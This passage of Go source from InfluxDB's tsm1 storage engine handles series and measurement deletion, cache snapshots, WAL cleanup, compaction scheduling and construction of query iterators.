measurements := make(map[string]struct{}, 1)
for _, k := range seriesKeys {
if len(k) == 0 {
continue // This key was wiped because it shouldn't be removed from index.
}
name, tags := models.ParseKeyBytes(k)
sid := e.sfile.SeriesID(name, tags, buf)
if sid == 0 {
continue
}
// See if this series was found in the cache earlier
i := bytesutil.SearchBytes(deleteKeys, k)
var hasCacheValues bool
// If there are multiple fields, they will have the same prefix. If any field
// has values, then we can't delete it from the index.
for i < len(deleteKeys) && bytes.HasPrefix(deleteKeys[i], k) {
if e.Cache.Values(deleteKeys[i]).Len() > 0 {
hasCacheValues = true
break
}
i++
}
if hasCacheValues {
continue
}
measurements[string(name)] = struct{}{}
// Remove the series from the local index.
if err := e.index.DropSeries(sid, k, false); err != nil {
return err
}
// Add the id to the set of delete ids.
ids.Add(sid)
}
fieldsetChanged := false
for k := range measurements {
if dropped, err := e.index.DropMeasurementIfSeriesNotExist([]byte(k)); err != nil {
return err
} else if dropped {
if err := e.cleanupMeasurement([]byte(k)); err != nil {
return err
}
fieldsetChanged = true
}
}
if fieldsetChanged {
if err := e.fieldset.Save(); err != nil {
return err
}
}
// Remove any series IDs for our set that still exist in other shards.
// We cannot remove these from the series file yet.
if err := e.seriesIDSets.ForEach(func(s *tsdb.SeriesIDSet) {
ids = ids.AndNot(s)
}); err != nil {
return err
}
// Remove the remaining ids from the series file as they no longer exist
// in any shard.
var err error
ids.ForEach(func(id uint64) {
name, tags := e.sfile.Series(id)
if err1 := e.sfile.DeleteSeriesID(id); err1 != nil {
err = err1
return
}
// In the case of the inmem index the series can be removed across
// the global index (all shards).
if index, ok := e.index.(*inmem.ShardIndex); ok {
key := models.MakeKey(name, tags)
if e := index.Index.DropSeriesGlobal(key); e != nil {
err = e
}
}
})
if err != nil {
return err
}
}
return nil
}
func (e *Engine) cleanupMeasurement(name []byte) error {
// A sentinel error to cause DeleteWithLock to not delete the measurement
abortErr := fmt.Errorf("measurements still exist")
// Under write lock, delete the measurement if we no longer have any data stored for
// the measurement. If data exists, we can't delete the field set yet as there
// were writes to the measurement while we are deleting it.
if err := e.fieldset.DeleteWithLock(string(name), func() error {
encodedName := models.EscapeMeasurement(name)
sep := len(encodedName)
// First scan the cache to see if any series exists for this measurement.
if err := e.Cache.ApplyEntryFn(func(k []byte, _ *entry) error {
if bytes.HasPrefix(k, encodedName) && (k[sep] == ',' || k[sep] == keyFieldSeparator[0]) {
return abortErr
}
return nil
}); err != nil {
return err
}
// Check the filestore.
return e.FileStore.WalkKeys(name, func(k []byte, _ byte) error {
if bytes.HasPrefix(k, encodedName) && (k[sep] == ',' || k[sep] == keyFieldSeparator[0]) {
return abortErr
}
return nil
})
}); err != nil && err != abortErr {
// Something else failed, return it
return err
}
return nil
}
// DeleteMeasurement deletes a measurement and all related series.
func (e *Engine) DeleteMeasurement(name []byte) error {
// Attempt to find the series keys.
indexSet := tsdb.IndexSet{Indexes: []tsdb.Index{e.index}, SeriesFile: e.sfile}
itr, err := indexSet.MeasurementSeriesByExprIterator(name, nil)
if err != nil {
return err
} else if itr == nil {
return nil
}
defer itr.Close()
return e.DeleteSeriesRange(tsdb.NewSeriesIteratorAdapter(e.sfile, itr), math.MinInt64, math.MaxInt64)
}
// ForEachMeasurementName iterates over each measurement name in the engine.
func (e *Engine) ForEachMeasurementName(fn func(name []byte) error) error {
return e.index.ForEachMeasurementName(fn)
}
func (e *Engine) CreateSeriesListIfNotExists(keys, names [][]byte, tagsSlice []models.Tags) error {
return e.index.CreateSeriesListIfNotExists(keys, names, tagsSlice)
}
func (e *Engine) CreateSeriesIfNotExists(key, name []byte, tags models.Tags) error {
return e.index.CreateSeriesIfNotExists(key, name, tags)
}
// WriteTo is not implemented.
func (e *Engine) WriteTo(w io.Writer) (n int64, err error) { panic("not implemented") }
// WriteSnapshot will snapshot the cache and write a new TSM file with its contents, releasing the snapshot when done.
func (e *Engine) WriteSnapshot() (err error) {
// Lock and grab the cache snapshot along with all the closed WAL
// filenames associated with the snapshot
started := time.Now()
log, logEnd := logger.NewOperation(context.TODO(), e.logger, "Cache snapshot", "tsm1_cache_snapshot")
defer func() {
elapsed := time.Since(started)
e.Cache.UpdateCompactTime(elapsed)
if err == nil {
log.Info("Snapshot for path written", zap.String("path", e.path), zap.Duration("duration", elapsed))
}
logEnd()
}()
closedFiles, snapshot, err := func() (segments []string, snapshot *Cache, err error) {
e.mu.Lock()
defer e.mu.Unlock()
if e.WALEnabled {
if err = e.WAL.CloseSegment(); err != nil {
return
}
segments, err = e.WAL.ClosedSegments()
if err != nil {
return
}
}
snapshot, err = e.Cache.Snapshot()
if err != nil {
return
}
return
}()
if err != nil {
return err
}
if snapshot.Size() == 0 {
e.Cache.ClearSnapshot(true)
return nil
}
// The snapshotted cache may have duplicate points and unsorted data. We need to deduplicate
// it before writing the snapshot. This can be very expensive so it's done while we are not
// holding the engine write lock.
dedup := time.Now()
snapshot.Deduplicate()
e.traceLogger.Info("Snapshot for path deduplicated",
zap.String("path", e.path),
zap.Duration("duration", time.Since(dedup)))
return e.writeSnapshotAndCommit(log, closedFiles, snapshot)
}
// CreateSnapshot will create a temp directory that holds
// temporary hardlinks to the underlying shard files.
func (e *Engine) CreateSnapshot() (string, error) {
if err := e.WriteSnapshot(); err != nil {
return "", err
}
e.mu.RLock()
defer e.mu.RUnlock()
path, err := e.FileStore.CreateSnapshot()
if err != nil {
return "", err
}
// Generate a snapshot of the index.
return path, nil
}
// writeSnapshotAndCommit will write the passed cache to a new TSM file and remove the closed WAL segments.
func (e *Engine) writeSnapshotAndCommit(log *zap.Logger, closedFiles []string, snapshot *Cache) (err error) {
defer func() {
if err != nil {
e.Cache.ClearSnapshot(false)
}
}()
// write the new snapshot files
newFiles, err := e.Compactor.WriteSnapshot(snapshot)
if err != nil {
log.Info("Error writing snapshot from compactor", zap.Error(err))
return err
}
e.mu.RLock()
defer e.mu.RUnlock()
// update the file store with these new files
if err := e.FileStore.Replace(nil, newFiles); err != nil {
log.Info("Error adding new TSM files from snapshot. Removing temp files.", zap.Error(err))
// Remove the new snapshot files. We will try again.
for _, file := range newFiles {
if err := os.Remove(file); err != nil {
log.Info("Unable to remove file", zap.String("path", file), zap.Error(err))
}
}
return err
}
// clear the snapshot from the in-memory cache, then the old WAL files
e.Cache.ClearSnapshot(true)
if e.WALEnabled {
if err := e.WAL.Remove(closedFiles); err != nil {
log.Info("Error removing closed WAL segments", zap.Error(err))
}
}
return nil
}
// compactCache continually checks if the WAL cache should be written to disk.
func (e *Engine) compactCache() {
t := time.NewTicker(time.Second)
defer t.Stop()
for {
e.mu.RLock()
quit := e.snapDone
e.mu.RUnlock()
select {
case <-quit:
return
case <-t.C:
e.Cache.UpdateAge()
if e.ShouldCompactCache(time.Now()) {
start := time.Now()
e.traceLogger.Info("Compacting cache", zap.String("path", e.path))
err := e.WriteSnapshot()
if err != nil && err != errCompactionsDisabled {
e.logger.Info("Error writing snapshot", zap.Error(err))
atomic.AddInt64(&e.stats.CacheCompactionErrors, 1)
} else {
atomic.AddInt64(&e.stats.CacheCompactions, 1)
}
atomic.AddInt64(&e.stats.CacheCompactionDuration, time.Since(start).Nanoseconds())
}
}
}
}
// ShouldCompactCache returns true if the Cache is over its flush threshold
// or if the passed in lastWriteTime is older than the write cold threshold.
func (e *Engine) ShouldCompactCache(t time.Time) bool {
sz := e.Cache.Size()
if sz == 0 {
return false
}
if sz > e.CacheFlushMemorySizeThreshold {
return true
}
return t.Sub(e.Cache.LastWriteTime()) > e.CacheFlushWriteColdDuration
}
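// Example for ShouldCompactCache (illustrative, assuming hypothetical settings of
// CacheFlushMemorySizeThreshold = 25MB and CacheFlushWriteColdDuration = 10m): a
// 30MB cache triggers a snapshot immediately on size, while a small but idle cache
// triggers one only after 10 minutes without a write. An empty cache never triggers.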
func (e *Engine) compact(wg *sync.WaitGroup) {
t := time.NewTicker(time.Second)
defer t.Stop()
for {
e.mu.RLock()
quit := e.done
e.mu.RUnlock()
select {
case <-quit:
return
case <-t.C:
// Find our compaction plans
level1Groups := e.CompactionPlan.PlanLevel(1)
level2Groups := e.CompactionPlan.PlanLevel(2)
level3Groups := e.CompactionPlan.PlanLevel(3)
level4Groups := e.CompactionPlan.Plan(e.LastModified())
atomic.StoreInt64(&e.stats.TSMOptimizeCompactionsQueue, int64(len(level4Groups)))
// If no full compactions are needed, see if an optimize is needed
if len(level4Groups) == 0 {
level4Groups = e.CompactionPlan.PlanOptimize()
atomic.StoreInt64(&e.stats.TSMOptimizeCompactionsQueue, int64(len(level4Groups)))
}
// Update the level plan queue stats
atomic.StoreInt64(&e.stats.TSMCompactionsQueue[0], int64(len(level1Groups)))
atomic.StoreInt64(&e.stats.TSMCompactionsQueue[1], int64(len(level2Groups)))
atomic.StoreInt64(&e.stats.TSMCompactionsQueue[2], int64(len(level3Groups)))
// Set the queue depths on the scheduler
e.scheduler.setDepth(1, len(level1Groups))
e.scheduler.setDepth(2, len(level2Groups))
e.scheduler.setDepth(3, len(level3Groups))
e.scheduler.setDepth(4, len(level4Groups))
// Find the next compaction that can run and try to kick it off
if level, runnable := e.scheduler.next(); runnable {
switch level {
case 1:
if e.compactHiPriorityLevel(level1Groups[0], 1, false, wg) {
level1Groups = level1Groups[1:]
}
case 2:
if e.compactHiPriorityLevel(level2Groups[0], 2, false, wg) {
level2Groups = level2Groups[1:]
}
case 3:
if e.compactLoPriorityLevel(level3Groups[0], 3, true, wg) {
level3Groups = level3Groups[1:]
}
case 4:
if e.compactFull(level4Groups[0], wg) {
level4Groups = level4Groups[1:]
}
}
}
// Release all the plans we didn't start.
e.CompactionPlan.Release(level1Groups)
e.CompactionPlan.Release(level2Groups)
e.CompactionPlan.Release(level3Groups)
e.CompactionPlan.Release(level4Groups)
}
}
}
// compactHiPriorityLevel kicks off compactions using the high priority policy. It returns
// true if the compaction was started
func (e *Engine) compactHiPriorityLevel(grp CompactionGroup, level int, fast bool, wg *sync.WaitGroup) bool {
s := e.levelCompactionStrategy(grp, fast, level)
if s == nil {
return false
}
// Try hi priority limiter, otherwise steal a little from the low priority if we can.
if e.compactionLimiter.TryTake() {
atomic.AddInt64(&e.stats.TSMCompactionsActive[level-1], 1)
wg.Add(1)
go func() {
defer wg.Done()
defer atomic.AddInt64(&e.stats.TSMCompactionsActive[level-1], -1)
defer e.compactionLimiter.Release()
s.Apply()
// Release the files in the compaction plan
e.CompactionPlan.Release([]CompactionGroup{s.group})
}()
return true
}
// The limiter is saturated; the compaction was not started.
return false
}
// compactLoPriorityLevel kicks off compactions using the lo priority policy. It returns
// true if the compaction was started.
func (e *Engine) compactLoPriorityLevel(grp CompactionGroup, level int, fast bool, wg *sync.WaitGroup) bool {
s := e.levelCompactionStrategy(grp, fast, level)
if s == nil {
return false
}
// Try the lo priority limiter, otherwise steal a little from the high priority if we can.
if e.compactionLimiter.TryTake() {
atomic.AddInt64(&e.stats.TSMCompactionsActive[level-1], 1)
wg.Add(1)
go func() {
defer wg.Done()
defer atomic.AddInt64(&e.stats.TSMCompactionsActive[level-1], -1)
defer e.compactionLimiter.Release()
s.Apply()
// Release the files in the compaction plan
e.CompactionPlan.Release([]CompactionGroup{s.group})
}()
return true
}
return false
}
// compactFull kicks off full and optimize compactions using the lo priority policy. It
// returns true if the compaction was started.
func (e *Engine) compactFull(grp CompactionGroup, wg *sync.WaitGroup) bool {
s := e.fullCompactionStrategy(grp, false)
if s == nil {
return false
}
// Try the lo priority limiter, otherwise steal a little from the high priority if we can.
if e.compactionLimiter.TryTake() {
atomic.AddInt64(&e.stats.TSMFullCompactionsActive, 1)
wg.Add(1)
go func() {
defer wg.Done()
defer atomic.AddInt64(&e.stats.TSMFullCompactionsActive, -1)
defer e.compactionLimiter.Release()
s.Apply()
// Release the files in the compaction plan
e.CompactionPlan.Release([]CompactionGroup{s.group})
}()
return true
}
return false
}
// compactionStrategy holds the details of what to do in a compaction.
type compactionStrategy struct {
group CompactionGroup
fast bool
level int
durationStat *int64
activeStat *int64
successStat *int64
errorStat *int64
logger *zap.Logger
compactor *Compactor
fileStore *FileStore
engine *Engine
}
// Apply executes the compaction strategy against its group and records the duration.
func (s *compactionStrategy) Apply() {
start := time.Now()
s.compactGroup()
atomic.AddInt64(s.durationStat, time.Since(start).Nanoseconds())
}
// compactGroup executes the compaction strategy against a single CompactionGroup.
func (s *compactionStrategy) compactGroup() {
group := s.group
log, logEnd := logger.NewOperation(context.TODO(), s.logger, "TSM compaction", "tsm1_compact_group")
defer logEnd()
log.Info("Beginning compaction", zap.Int("tsm1_files_n", len(group)))
for i, f := range group {
log.Info("Compacting file", zap.Int("tsm1_index", i), zap.String("tsm1_file", f))
}
var (
err error
files []string
)
if s.fast {
files, err = s.compactor.CompactFast(group)
} else {
files, err = s.compactor.CompactFull(group)
}
if err != nil {
_, inProgress := err.(errCompactionInProgress)
if err == errCompactionsDisabled || inProgress {
log.Info("Aborted compaction", zap.Error(err))
if _, ok := err.(errCompactionInProgress); ok {
time.Sleep(time.Second)
}
return
}
log.Warn("Error compacting TSM files", zap.Error(err))
// We hit a bad TSM file - rename so the next compaction can proceed.
if _, ok := err.(errBlockRead); ok {
path := err.(errBlockRead).file
log.Info("Renaming a corrupt TSM file due to compaction error", zap.Error(err))
if err := s.fileStore.ReplaceWithCallback([]string{path}, nil, nil); err != nil {
log.Info("Error removing bad TSM file", zap.Error(err))
} else if e := os.Rename(path, path+"."+BadTSMFileExtension); e != nil {
log.Info("Error renaming corrupt TSM file", zap.Error((err)))
}
}
atomic.AddInt64(s.errorStat, 1)
time.Sleep(time.Second)
return
}
if err := s.fileStore.ReplaceWithCallback(group, files, nil); err != nil {
log.Info("Error replacing new TSM files", zap.Error(err))
atomic.AddInt64(s.errorStat, 1)
time.Sleep(time.Second)
// Remove the new snapshot files. We will try again.
for _, file := range files {
if err := os.Remove(file); err != nil {
log.Error("Unable to remove file", zap.String("path", file), zap.Error(err))
}
}
return
}
for i, f := range files {
log.Info("Compacted file", zap.Int("tsm1_index", i), zap.String("tsm1_file", f))
}
log.Info("Finished compacting files",
zap.Int("tsm1_files_n", len(files)))
atomic.AddInt64(s.successStat, 1)
}
// levelCompactionStrategy returns a compactionStrategy for compacting a group
// of TSM files at the given level.
func (e *Engine) levelCompactionStrategy(group CompactionGroup, fast bool, level int) *compactionStrategy {
return &compactionStrategy{
group: group,
logger: e.logger.With(zap.Int("tsm1_level", level), zap.String("tsm1_strategy", "level")),
fileStore: e.FileStore,
compactor: e.Compactor,
fast: fast,
engine: e,
level: level,
activeStat: &e.stats.TSMCompactionsActive[level-1],
successStat: &e.stats.TSMCompactions[level-1],
errorStat: &e.stats.TSMCompactionErrors[level-1],
durationStat: &e.stats.TSMCompactionDuration[level-1],
}
}
// fullCompactionStrategy returns a compactionStrategy for higher level
// generations of TSM files.
func (e *Engine) fullCompactionStrategy(group CompactionGroup, optimize bool) *compactionStrategy {
s := &compactionStrategy{
group: group,
logger: e.logger.With(zap.String("tsm1_strategy", "full"), zap.Bool("tsm1_optimize", optimize)),
fileStore: e.FileStore,
compactor: e.Compactor,
fast: optimize,
engine: e,
level: 4,
}
if optimize {
s.activeStat = &e.stats.TSMOptimizeCompactionsActive
s.successStat = &e.stats.TSMOptimizeCompactions
s.errorStat = &e.stats.TSMOptimizeCompactionErrors
s.durationStat = &e.stats.TSMOptimizeCompactionDuration
} else {
s.activeStat = &e.stats.TSMFullCompactionsActive
s.successStat = &e.stats.TSMFullCompactions
s.errorStat = &e.stats.TSMFullCompactionErrors
s.durationStat = &e.stats.TSMFullCompactionDuration
}
return s
}
// reloadCache reads the WAL segment files and loads them into the cache.
func (e *Engine) reloadCache() error {
now := time.Now()
files, err := segmentFileNames(e.WAL.Path())
if err != nil {
return err
}
limit := e.Cache.MaxSize()
defer func() {
e.Cache.SetMaxSize(limit)
}()
// Disable the max size during loading
e.Cache.SetMaxSize(0)
loader := NewCacheLoader(files)
loader.WithLogger(e.logger)
if err := loader.Load(e.Cache); err != nil {
return err
}
e.traceLogger.Info("Reloaded WAL cache",
zap.String("path", e.WAL.Path()), zap.Duration("duration", time.Since(now)))
return nil
}
// cleanup removes all temp files and dirs that exist on disk. This should only be run at startup to avoid
// removing tmp files that are still in use.
func (e *Engine) cleanup() error {
allfiles, err := ioutil.ReadDir(e.path)
if os.IsNotExist(err) {
return nil
} else if err != nil {
return err
}
ext := fmt.Sprintf(".%s", TmpTSMFileExtension)
for _, f := range allfiles {
// Check to see if there are any `.tmp` directories that were left over from failed shard snapshots
if f.IsDir() && strings.HasSuffix(f.Name(), ext) {
if err := os.RemoveAll(filepath.Join(e.path, f.Name())); err != nil {
return fmt.Errorf("error removing tmp snapshot directory %q: %s", f.Name(), err)
}
}
}
return e.cleanupTempTSMFiles()
}
func (e *Engine) cleanupTempTSMFiles() error {
files, err := filepath.Glob(filepath.Join(e.path, fmt.Sprintf("*.%s", CompactionTempExtension)))
if err != nil {
return fmt.Errorf("error getting compaction temp files: %s", err.Error())
}
for _, f := range files {
if err := os.Remove(f); err != nil {
return fmt.Errorf("error removing temp compaction files: %v", err)
}
}
return nil
}
// KeyCursor returns a KeyCursor for the given key starting at time t.
func (e *Engine) KeyCursor(ctx context.Context, key []byte, t int64, ascending bool) *KeyCursor {
return e.FileStore.KeyCursor(ctx, key, t, ascending)
}
// CreateIterator returns an iterator for the measurement based on opt.
func (e *Engine) CreateIterator(ctx context.Context, measurement string, opt query.IteratorOptions) (query.Iterator, error) {
if span := tracing.SpanFromContext(ctx); span != nil {
labels := []string{"shard_id", strconv.Itoa(int(e.id)), "measurement", measurement}
if opt.Condition != nil {
labels = append(labels, "cond", opt.Condition.String())
}
span = span.StartSpan("create_iterator")
span.SetLabels(labels...)
ctx = tracing.NewContextWithSpan(ctx, span)
group := metrics.NewGroup(tsmGroup)
ctx = metrics.NewContextWithGroup(ctx, group)
start := time.Now()
defer group.GetTimer(planningTimer).UpdateSince(start)
}
if call, ok := opt.Expr.(*influxql.Call); ok {
if opt.Interval.IsZero() {
if call.Name == "first" || call.Name == "last" {
refOpt := opt
refOpt.Limit = 1
refOpt.Ascending = call.Name == "first"
refOpt.Ordered = true
refOpt.Expr = call.Args[0]
itrs, err := e.createVarRefIterator(ctx, measurement, refOpt)
if err != nil {
return nil, err
}
return newMergeFinalizerIterator(ctx, itrs, opt, e.logger)
}
}
inputs, err := e.createCallIterator(ctx, measurement, call, opt)
if err != nil {
return nil, err
} else if len(inputs) == 0 {
return nil, nil
}
return newMergeFinalizerIterator(ctx, inputs, opt, e.logger)
}
itrs, err := e.createVarRefIterator(ctx, measurement, opt)
if err != nil {
return nil, err
}
return newMergeFinalizerIterator(ctx, itrs, opt, e.logger)
}
type indexTagSets interface {
TagSets(name []byte, options query.IteratorOptions) ([]*query.TagSet, error)
}
func (e *Engine) createCallIterator(ctx context.Context, measurement string, call *influxql.Call, opt query.IteratorOptions) ([]query.Iterator, error) {
ref, _ := call.Args[0].(*influxql.VarRef)
if exists, err := e.index.MeasurementExists([]byte(measurement)); err != nil {
return nil, err
} else if !exists {
return nil, nil
}
// Determine tagsets for this measurement based on dimensions and filters.
var (
tagSets []*query.TagSet
err error
)
if e.index.Type() == tsdb.InmemIndexName {
ts := e.index.(indexTagSets)
tagSets, err = ts.TagSets([]byte(measurement), opt)
} else {
indexSet := tsdb.IndexSet{Indexes: []tsdb.Index{e.index}, SeriesFile: e.sfile}
tagSets, err = indexSet.TagSets(e.sfile, []byte(measurement), opt)
}
if err != nil {
return nil, err
}
// Reverse the tag sets if we are ordering by descending.
if !opt.Ascending {
for _, t := range tagSets {
t.Reverse()
}
}
// Calculate tag sets and apply SLIMIT/SOFFSET.
tagSets = query.LimitTagSets(tagSets, opt.SLimit, opt.SOffset)
itrs := make([]query.Iterator, 0, len(tagSets))
if err := func() error {
for _, t := range tagSets {
// Abort if the query was killed
select {
case <-opt.InterruptCh:
query.Iterators(itrs).Close()
return query.ErrQueryInterrupted
default:
}
inputs, err := e.createTagSetIterators(ctx, ref, measurement, t, opt)
if err != nil {
return err
} else if len(inputs) == 0 {
continue
}
// Wrap each series in a call iterator.
for i, input := range inputs {
if opt.InterruptCh != nil {
input = query.NewInterruptIterator(input, opt.InterruptCh)
}
itr, err := query.NewCallIterator(input, opt)
if err != nil {
query.Iterators(inputs).Close()
return err
}
inputs[i] = itr
}
itr := query.NewParallelMergeIterator(inputs, opt, runtime.GOMAXPROCS(0))
itrs = append(itrs, itr)
}
return nil
}(); err != nil {
query.Iterators(itrs).Close()
return nil, err
}
return itrs, nil
}
// createVarRefIterator creates an iterator for a variable reference.
func (e *Engine) createVarRefIterator(ctx context.Context, measurement string, opt query.IteratorOptions) ([]query.Iterator, error) {
ref, _ := opt.Expr.(*influxql.VarRef)
if exists, err := e.index.MeasurementExists([]byte(measurement)); err != nil {
return nil, err
} else if !exists {
return nil, nil
}
var (
tagSets []*query.TagSet
err error
)
if e.index.Type() == tsdb.InmemIndexName {
ts := e.index.(indexTagSets)
tagSets, err = ts.TagSets([]byte(measurement), opt)
} else {
indexSet := tsdb.IndexSet{Indexes: []tsdb.Index{e.index}, SeriesFile: e.sfile}
tagSets, err = indexSet.TagSets(e.sfile, []byte(measurement), opt)
}
if err != nil {
return nil, err
}
// Reverse the tag sets if we are ordering by descending.
if !opt.Ascending {
for _, t := range tagSets {
t.Reverse()
}
}
// Calculate tag sets and apply SLIMIT/SOFFSET.
tagSets = query.LimitTagSets(tagSets, opt.SLimit, opt.SOffset)
itrs := make([]query.Iterator, 0, len(tagSets))
if err := func() error {
for _, t := range tagSets {
inputs, err := e.createTagSetIterators(ctx, ref, measurement, t, opt)
if err != nil {
return err
} else if len(inputs) == 0 {
continue
}
// If we have a LIMIT or OFFSET and the grouping of the outer query
// is different than the current grouping, we need to perform the
// limit on each of the individual series keys instead to improve
// performance.
if (opt.Limit > 0 || opt.Offset > 0) && len(opt.Dimensions) != len(opt.GroupBy) {
for i, input := range inputs {
inputs[i] = newLimitIterator(input, opt)
}
}
itr, err := query.Iterators(inputs).Merge(opt)
if err != nil {
query.Iterators(inputs).Close()
return err
}
// Apply a limit on the merged iterator.
if opt.Limit > 0 || opt.Offset > 0 {
if len(opt.Dimensions) == len(opt.GroupBy) {
// When the final dimensions and the current grouping are
// the same, we will only produce one series so we can use
// the faster limit iterator.
itr = newLimitIterator(itr, opt)
} else {
// When the dimensions are different than the current
// grouping, we need to account for the possibility there
// will be multiple series. The limit iterator in the
// influxql package handles that scenario.
itr = query.NewLimitIterator(itr, opt)
}
}
itrs = append(itrs, itr)
}
return nil
}(); err != nil {
query.Iterators(itrs).Close()
return nil, err
}
return itrs, nil
}
// createTagSetIterators creates a set of iterators for a tagset.
func (e *Engine) createTagSetIterators(ctx context.Context, ref *influxql.VarRef, name string, t *query.TagSet, opt query.IteratorOptions) ([]query.Iterator, error) {
// Set parallelism by number of logical cpus.
parallelism := runtime.GOMAXPROCS(0)
if parallelism > len(t.SeriesKeys) {
parallelism = len(t.SeriesKeys)
}
// Create series key groupings, each with space for its iterators and a per-group error.
groups := make([]struct {
keys []string
filters []influxql.Expr
itrs []query.Iterator
err error
}, parallelism)
// Group series keys.
n := len(t.SeriesKeys) / parallelism
for i := 0; i < parallelism; i++ {
group := &groups[i]
if i < parallelism-1 {
group.keys = t.SeriesKeys[i*n : (i+1)*n]
group.filters = t.Filters[i*n : (i+1)*n]
} else {
group.keys = t.SeriesKeys[i*n:]
group.filters = t.Filters[i*n:]
}
}
// Read series groups in parallel.
var wg sync.WaitGroup
for i := range groups {
wg.Add(1)
go func(i int) {
defer wg.Done()
groups[i].itrs, groups[i].err = e.createTagSetGroupIterators(ctx, ref, name, groups[i].keys, t, groups[i].filters, opt)
}(i)
}
wg.Wait()
// Determine total number of iterators so we can allocate only once.
var itrN int
for _, group := range groups {
itrN += len(group.itrs)
}
// Combine all iterators together and check for errors.
var err error
itrs := make([]query.Iterator, 0, itrN)
for _, group := range groups {
if group.err != nil {
err = group.err
}
itrs = append(itrs, group.itrs...)
}
// If an error occurred, make sure we close all created iterators.
if err != nil {
query.Iterators(itrs).Close()
return nil, err
}
return itrs, nil
}
// createTagSetGroupIterators creates a set of iterators for a subset of a tagset's series.
func (e *Engine) createTagSetGroupIterators(ctx context.Context, ref *influxql.VarRef, name string, seriesKeys []string, t *query.TagSet, filters []influxql.Expr, opt query.IteratorOptions) ([]query.Iterator, error) {
itrs := make([]query.Iterator, 0, len(seriesKeys))
for i, seriesKey := range seriesKeys {
var conditionFields []influxql.VarRef
if filters[i] != nil {
// Retrieve non-time fields from this series filter and filter out tags.
conditionFields = influxql.ExprNames(filters[i])
}
itr, err := e.createVarRefSeriesIterator(ctx, ref, name, seriesKey, t, filters[i], conditionFields, opt)
if err != nil {
return itrs, err
} else if itr == nil {
continue
}
itrs = append(itrs, itr)
// Abort if the query was killed
select {
case <-opt.InterruptCh:
query.Iterators(itrs).Close()
return nil, query.ErrQueryInterrupted
default:
}
// Enforce series limit at creation time.
if opt.MaxSeriesN > 0 && len(itrs) > opt.MaxSeriesN {
query.Iterators(itrs).Close()
return nil, fmt.Errorf("max-select-series limit exceeded: (%d/%d)", len(itrs), opt.MaxSeriesN)
}
}
return itrs, nil
}
// createVarRefSeriesIterator creates an iterator for a variable reference for a series.
func (e *Engine) createVarRefSeriesIterator(ctx context.Context, ref *influxql.VarRef, name string, seriesKey string, t *query.TagSet, filter influxql.Expr, conditionFields []influxql.VarRef, opt query.IteratorOptions) (query.Iterator, error) {
_, tfs := models.ParseKey([]byte(seriesKey))
tags := query.NewTags(tfs.Map())
// Create options specific for this series.
itrOpt := opt
itrOpt.Condition = filter
var curCounter, auxCounter, condCounter *metrics.Counter
if col := metrics.GroupFromContext(ctx); col != nil {
curCounter = col.GetCounter(numberOfRefCursorsCounter)
auxCounter = col.GetCounter(numberOfAuxCursorsCounter)
condCounter = col.GetCounter(numberOfCondCursorsCounter)
}
// Build main cursor.
var cur cursor
if ref != nil {
cur = e.buildCursor(ctx, name, seriesKey, tfs, ref, opt)
// If the field doesn't exist then don't build an iterator.
if cur == nil {
return nil, nil
}
if curCounter != nil {
curCounter.Add(1)
}
}
// Build auxiliary cursors.
// Tag values should be returned if the field doesn't exist.
var aux []cursorAt
if len(opt.Aux) > 0 {
aux = make([]cursorAt, len(opt.Aux))
for i, ref := range opt.Aux {
// Create cursor from field if a tag wasn't requested.
if ref.Type != influxql.Tag {
cur := e.buildCursor(ctx, name, seriesKey, tfs, &ref, opt)
if cur != nil {
if auxCounter != nil {
auxCounter.Add(1)
}
aux[i] = newBufCursor(cur, opt.Ascending)
continue
}
// If a field was requested, use a nil cursor of the requested type.
switch ref.Type {
case influxql.Float, influxql.AnyField:
aux[i] = nilFloatLiteralValueCursor
continue
case influxql.Integer:
aux[i] = nilIntegerLiteralValueCursor
continue
case influxql.Unsigned:
aux[i] = nilUnsignedLiteralValueCursor
continue
case influxql.String:
aux[i] = nilStringLiteralValueCursor
continue
case influxql.Boolean:
aux[i] = nilBooleanLiteralValueCursor
continue
}
}
// If field doesn't exist, use the tag value.
if v := tags.Value(ref.Val); v == "" {
// However, if the tag value is blank then return a null.
aux[i] = nilStringLiteralValueCursor
} else {
aux[i] = &literalValueCursor{value: v}
}
}
}
// Remove _tagKey condition field.
// We can't search on it because we can't join it to _tagValue based on time.
if varRefSliceContains(conditionFields, "_tagKey") {
conditionFields = varRefSliceRemove(conditionFields, "_tagKey")
// Remove _tagKey conditional references from iterator.
itrOpt.Condition = influxql.RewriteExpr(influxql.CloneExpr(itrOpt.Condition), func(expr influxql.Expr) influxql.Expr {
switch expr := expr.(type) {
case *influxql.BinaryExpr:
if ref, ok := expr.LHS.(*influxql.VarRef); ok && ref.Val == "_tagKey" {
return &influxql.BooleanLiteral{Val: true}
}
if ref, ok := expr.RHS.(*influxql.VarRef); ok && ref.Val == "_tagKey" {
return &influxql.BooleanLiteral{Val: true}
}
}
return expr
})
}
// Build conditional field cursors.
// If a conditional field doesn't exist then ignore the series.
var conds []cursorAt
if len(conditionFields) > 0 {
conds = make([]cursorAt, len(conditionFields))
for i, ref := range conditionFields {
// Create cursor from field if a tag wasn't requested.
if ref.Type != influxql.Tag {
cur := e.buildCursor(ctx, name, seriesKey, tfs, &ref, opt)
if cur != nil {
if condCounter != nil {
condCounter.Add(1)
}
conds[i] = newBufCursor(cur, opt.Ascending)
continue
}
// If a field was requested, use a nil cursor of the requested type.
switch ref.Type {
case influxql.Float, influxql.AnyField:
conds[i] = nilFloatLiteralValueCursor
continue
case influxql.Integer:
conds[i] = nilIntegerLiteralValueCursor
continue
case influxql.Unsigned:
conds[i] = nilUnsignedLiteralValueCursor
continue
case influxql.String:
conds[i] = nilStringLiteralValueCursor
continue
case influxql.Boolean:
conds[i] = nilBooleanLiteralValueCursor
continue
}
}
// If field doesn't exist, use the tag value.
if v := tags.Value(ref.Val); v == "" {
// However, if the tag value is blank then return a null.
conds[i] = nilStringLiteralValueCursor
} else {
conds[i] = &literalValueCursor{value: v}
}
}
}
condNames := influxql.VarRefs(conditionFields).Strings()
// Limit tags to only the dimensions selected.
dimensions := opt.GetDimensions()
tags = tags.Subset(dimensions)
// If it's only auxiliary fields then it doesn't matter what type of iterator we use.
if ref == nil {
if opt.StripName {
name = ""
}
return newFloatIterator(name, tags, itrOpt, nil, aux, conds, condNames), nil
}
// Remove name if requested.
if opt.StripName {
name = ""
}
switch cur := cur.(type) {
case floatCursor:
return newFloatIterator(name, tags, itrOpt, cur, aux, conds, condNames), nil
case integerCursor:
return newIntegerIterator(name, tags, itrOpt, cur, aux, conds, condNames), nil
case unsignedCursor:
return newUnsignedIterator(name, tags, itrOpt, cur, aux, conds, condNames), nil
case stringCursor:
